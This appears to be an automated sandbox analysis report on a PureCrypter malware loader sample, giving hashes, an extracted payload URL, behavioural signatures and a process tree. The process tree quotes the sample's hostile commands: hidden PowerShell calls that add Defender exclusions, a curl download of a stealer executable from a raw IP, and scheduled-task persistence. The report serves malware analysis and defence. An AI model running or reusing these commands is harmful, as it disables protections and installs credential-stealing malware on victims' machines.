Analysis
-
max time kernel
83s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
28-02-2023 00:58
Static task
static1
Behavioral task
behavioral1
Sample
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Resource
win10v2004-20230220-en
General
-
Target
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
-
Size
1.3MB
-
MD5
f1c29ba01377c35e6f920f0aa626eaf5
-
SHA1
7b2c191bc2d5d549c5e65613f93d59ece1842f02
-
SHA256
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
-
SHA512
449a9d0ec42f83be09ef7a258f50f3d07728bb9f06361dc4aebdcbcce0ca010a3c894a5d27d98f197d6b4b85be4e3639656ae75a0216e8e169c54717ad2a85f0
-
SSDEEP
24576:hT+ua8m657w6ZBLmkitKqBCjC0PDgM5AVnipXD1Z+7:hcVV1BCjBG2
Malware Config
Extracted
purecrypter
https://cents-ability.org/loader/uploads/noicon_Ujizjydo.bmp
Signatures
-
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation Stearler.exe -
Executes dropped EXE 2 IoCs
pid Process 1408 noicon.exe 952 Stearler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 212 schtasks.exe 2188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4552 powershell.exe 4552 powershell.exe 5056 powershell.exe 5056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1408 noicon.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4392 wrote to memory of 1408 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 84 PID 4392 wrote to memory of 1408 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 84 PID 4392 wrote to memory of 1408 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 84 PID 4392 wrote to memory of 952 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 85 PID 4392 wrote to memory of 952 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 85 PID 4392 wrote to memory of 952 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 85 PID 4392 wrote to memory of 2376 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 86 PID 4392 wrote to memory of 2376 4392 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe 86 PID 2376 wrote to memory of 212 2376 cmd.exe 88 PID 2376 wrote to memory of 212 2376 cmd.exe 88 PID 2376 wrote to memory of 2188 2376 cmd.exe 89 PID 2376 wrote to memory of 2188 2376 cmd.exe 89 PID 952 wrote to memory of 4560 952 Stearler.exe 90 PID 952 wrote to memory of 4560 952 Stearler.exe 90 PID 952 wrote to memory of 4560 952 Stearler.exe 90 PID 4560 wrote to memory of 4552 4560 cmd.exe 93 PID 4560 wrote to memory of 4552 4560 cmd.exe 93 PID 4560 wrote to memory of 4552 4560 cmd.exe 93 PID 4560 wrote to memory of 5056 4560 cmd.exe 94 PID 4560 wrote to memory of 5056 4560 cmd.exe 94 PID 4560 wrote to memory of 5056 4560 cmd.exe 94 PID 4560 wrote to memory of 4780 4560 cmd.exe 95 PID 4560 wrote to memory of 4780 4560 cmd.exe 95 PID 4560 wrote to memory of 4780 4560 cmd.exe 95 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Users\Administrator\Desktop\DROP\noicon.exe"C:\Users\Administrator\Desktop\DROP\noicon.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Users\Administrator\Desktop\DROP\Stearler.exe"C:\Users\Administrator\Desktop\DROP\Stearler.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS98BA.tmp\Testobfusc.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\SysWOW64\curl.execurl http://140.82.34.147/Stealer.exe -o C:\Users\Public\Downloads\Stealer.exe4⤵PID:4780
-
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "testM" /xml "C:\Users\Admin\AppData\Local\Temp\f1.xml"3⤵
- Creates scheduled task(s)
PID:212
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "test" /xml "C:\Users\Admin\AppData\Local\Temp\f2.xml"3⤵
- Creates scheduled task(s)
PID:2188
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD59e30fd5104c4876d2a2b993119a5763e
SHA1c36963bcf35c684024ddb7c51107636609cdcaa1
SHA2569310c0c07030576929319cc13a17dd315307caa7ea96d61c6a4fe0336f07d3d0
SHA512614080dd581930560c6f432dea4c974ad0c0f095157a6f58c45d58b51253cd8f2fb48266dec15533898aed0962bad61914dae7fc900916201b8586c87b1b7a98
-
Filesize
14KB
MD540e65da3d99568737a62d30060539f23
SHA1c5b616eb054a850b019da2d19e42b82575a269c1
SHA256a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5
SHA512ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5e72ae2ea8505b32bd7b3538c336922ab
SHA17eeb1c8c12227f6ea22305446a677aef747ad3ca
SHA256a764aaaca9c6c4f5f9057fe5ad6da7afc953302afe877d1877c8a08828786e23
SHA512b5d90006efb0200c8c7396229326fc380e5c6732786e9d57c4d3352e8157faa1a829d79b1532aa6e84ba816f55d476cd57ebcc448e00467186a59bf3eb2f0dd6
-
Filesize
1KB
MD5d88899226309bb38cea2e30d33dc4b88
SHA114432e6088ddcf82a92d6137ac7707932c9a2ddf
SHA2560d23f8be57f264e7a5b0c2f0606608df3bf69270c76cf21e4f0869348cfff1a2
SHA5128d954bb52537c181bf1d4a7797e930264088803b679c86260e0fcbe5cdb9b57c72bfd254f349d39842dcb44911d3019f576bd1321bb11da6f05bd0859bdf87d6
-
Filesize
127KB
MD5c07c33c5e7c12107f2788280ad31c391
SHA18e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA5128109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1
-
Filesize
127KB
MD5c07c33c5e7c12107f2788280ad31c391
SHA18e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA5128109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1
-
Filesize
127KB
MD5c07c33c5e7c12107f2788280ad31c391
SHA18e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA5128109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1
-
Filesize
16.0MB
MD5fdd4cd11d278dab26c2c8551e006c4ed
SHA1f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA25680d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA5129333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb
-
Filesize
16.0MB
MD5fdd4cd11d278dab26c2c8551e006c4ed
SHA1f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA25680d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA5129333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb
-
Filesize
16.0MB
MD5fdd4cd11d278dab26c2c8551e006c4ed
SHA1f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA25680d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA5129333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb